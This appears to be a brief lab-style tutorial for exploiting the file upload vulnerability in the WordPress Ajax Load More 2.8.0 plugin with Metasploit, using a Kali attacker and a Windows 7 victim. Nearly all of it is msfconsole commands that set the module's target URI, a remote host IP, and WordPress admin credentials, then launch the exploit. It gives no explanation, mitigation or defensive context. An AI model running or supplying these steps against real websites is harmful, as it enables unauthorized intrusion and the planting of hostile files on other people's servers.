Exploit Targets
WordPress Ajax Load More 2.8.0
Requirement
Attacker: kali Linux
Victim PC: Windows 7
Open Kali terminal type msfconsole
msf exploit (wp_ajax_load_more_file_upload)>set targeturi wordpress
msf exploit (wp_ajax_load_more_file_upload)>set rhost 192.168.0.110 (IP of Remote Host)
msf exploit (wp_ajax_load_more_file_upload)>set wp_username admin
msf exploit (wp_ajax_load_more_file_upload)>set wp_password admin123
msf exploit (wp_ajax_load_more_file_upload)>exploit